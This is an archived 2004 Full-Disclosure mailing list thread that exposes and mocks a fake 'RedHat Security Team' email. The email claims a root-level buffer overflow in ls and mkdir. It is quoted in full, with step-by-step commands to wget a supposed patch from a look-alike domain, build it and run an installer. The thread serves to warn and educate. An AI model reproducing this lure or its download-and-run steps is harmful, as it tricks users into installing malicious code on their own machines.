| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: hhoffman at ip-solutions.net (Harry Hoffman) Subject: FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" haha, that's pretty funny. If they were going to do something like that it should have at least been in a rpm format. I'm hoping that this doesn't need to be said but if neither "yum check-update || up2date -l" report anything then chances are there are no "Official Fedora Updates" --Harry Hugo van der Kooij wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > Be advised. > > The message below is currently going around on internet. Being unsinged > was the fist obvious issue. Not pointing to RPM updates, being in a > different format and such were among the other reasong to suspect it. > > Message was send from 'University of Texas at Arlington'. > > I am sure none of you should be fooled by such a message but other might > be. > > And while it lasts you may want to get the file for your own educational > purposes. > > Hugo. > - ---------- Forwarded message ---------- > Date: Sun, 24 Oct 2004 17:22:20 -0500 > From: RedHat Security Team <security@...hat.com> > To: ***************** > Subject: RedHat: Buffer Overflow in "ls" and "mkdir" > > > [logo_rh_home.png] > > Original issue date: October 20, 2004 > Last revised: October 20, 2004 > Source: RedHat > > A complete revision history is at the end of this file. > > Dear RedHat user, > > Redhat found a vulnerability in fileutils (ls and mkdir), that could > allow a remote attacker to execute arbitrary code with root privileges. > Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, > RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is > known that *BSD and Solaris platforms are NOT affected. > > The RedHat Security Team strongly advises you to immediately apply the > fileutils-1.0.6 patch. This is a critical-critical update that you must > make by following these steps: > > * First download the patch from the Security RedHat mirror: wget > www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz > * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz > * cd fileutils-1.0.6.patch > * make > * ./inst > > Again, please apply this patch as soon as possible or you risk your > system and others` to be compromised. > > Thank you for your prompt attention to this serious matter, > > RedHat Security Team. > > Copyright (C) 2004 Red Hat, Inc. All rights reserved. > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.2.3 (GNU/Linux) > > iQCVAwUBQXwzy6YKnAPlJw4JAQEdiQP/Q9joitf0xM69z6AvkMA0gjumokNccKB7 > OQk+wDNpPYz881/BuycJ15Oory1+zIFiFyVJr7S0CYcQsZLFkeAQaGGNFj6PpHQo > H6u5QdRLoK1qWLethUSa73edjEYCwpTtVlFnCuPYRVqMtFKSooLXMSS/2SV9H8pL > fcdKycT5D9E= > =/nEk > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists